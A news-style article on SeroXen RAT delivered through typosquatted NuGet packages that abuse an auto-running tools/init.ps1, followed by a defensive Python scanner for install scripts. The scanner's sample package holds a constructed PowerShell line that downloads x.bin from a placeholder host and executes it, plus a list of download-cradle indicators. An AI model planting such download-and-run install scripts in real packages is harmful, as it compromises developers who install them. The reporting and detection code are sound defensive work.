The SeroXen RAT, a remote access trojan, was recently found to be distributed through a malicious package on NuGet, the package manager for the .NET Framework. The suspicious package, Pathoschild.Stardew.Mod.Build.Config, credited to a user named Disti, deliberately mimics the legitimate package Pathoschild.Stardew.ModBuildConfig.
The legitimate package has received about 79,000 downloads, according to Phylum, a software supply chain security company, while the malicious version, released on October 6, 2023, artificially inflated its download count to exceed 100,000. The same user's profile lists six further packages with a combined total of almost 2.1 million downloads. Four of them, named Kraken, KuCoin, Solana, and Monero, pose as crypto service libraries but actually contain the SeroXen RAT deployment code.
The infection chain begins when the package is installed: a script at tools/init.ps1 is designed to run code silently. This behavior, which JFrog identified as a security flaw in March 2023, is used to retrieve further malware. Although the feature is marked as deprecated, Visual Studio still honors the init.ps1 script and lets it run unattended while installing NuGet packages, so attackers can place any commands they want in this .ps1 file.
In the specific package Phylum analyzed, a PowerShell script is used to retrieve a file named x.bin from a remote server, which is actually a Windows Batch script that has been substantially modified. The deployment of the SeroXen RAT is the result of another PowerShell script that is created and executed by this Batch script.
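As an added defensive example (not code from Phylum, JFrog or the article), the following Python check opens a .nupkg archive, lists any install-time PowerShell scripts under tools/ such as init.ps1, and flags common download-and-execute indicators in them for review. The sample package, its script contents and the hypothetical host example.invalid are constructed here; only the file name x.bin is taken from the article.

```python
"""Scan a .nupkg for install-time PowerShell scripts (tools/init.ps1 and
friends) that Visual Studio may execute unattended on package install."""
import io
import re
import zipfile

# Script names NuGet/Visual Studio historically runs during install/uninstall.
INSTALL_SCRIPTS = {"init.ps1", "install.ps1", "uninstall.ps1"}
# Simple download-and-execute indicators worth a human review.
CRADLE_PATTERNS = [
    r"downloadfile", r"downloadstring", r"invoke-webrequest", r"\biwr\b",
    r"invoke-expression", r"\biex\b", r"start-process",
]

def scan_nupkg(data: bytes) -> dict:
    """Return {script path: [matched indicators]} for install scripts in a .nupkg."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            parts = name.lower().split("/")
            # A .nupkg is a zip; install scripts live under the tools/ folder.
            if len(parts) >= 2 and parts[0] == "tools" and parts[-1] in INSTALL_SCRIPTS:
                text = pkg.read(name).decode("utf-8", errors="replace")
                hits = sorted({p for p in CRADLE_PATTERNS if re.search(p, text, re.I)})
                findings[name] = hits
    return findings

def build_sample_nupkg(with_init: bool) -> bytes:
    """Construct a minimal .nupkg in memory (constructed sample, not a real package)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("Example.nuspec", "<package><metadata><id>Example</id></metadata></package>")
        pkg.writestr("lib/net48/Example.dll", b"MZ")
        if with_init:
            # Constructed stand-in for an init.ps1 that fetches and runs a payload;
            # the host is a placeholder, not a real indicator.
            pkg.writestr("tools/init.ps1",
                         "(New-Object Net.WebClient).DownloadFile('https://example.invalid/x.bin', $f)\n"
                         "Start-Process $f\n")
    return buf.getvalue()

if __name__ == "__main__":
    for flag in (False, True):
        print(scan_nupkg(build_sample_nupkg(flag)))
```

Any package that reports a tools/ script is worth inspecting before it is allowed into a build, even when no cradle pattern matched.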
SeroXen RAT is easy for cybercriminals to obtain: it is commodity malware sold for $60 as a lifetime package. This fileless RAT combines elements of the NirCmd Windows command-line tool, the r77 rootkit, and the Quasar RAT.
According to Phylum, the continuous exploitation of open-source ecosystems and the developers that use them is highlighted by the existence of SeroXen RAT within NuGet packages.
The attack strategy relies on exploiting developers’ trust: a single malicious piece of code is introduced into trusted, well-established codebases, enabling the exfiltration of private cloud credentials. The attacker keeps the packages’ original functionality intact in order to blend in. Both Phylum and Checkmarx, which provided additional details on the same campaign, have recognized this simple yet effective strategy.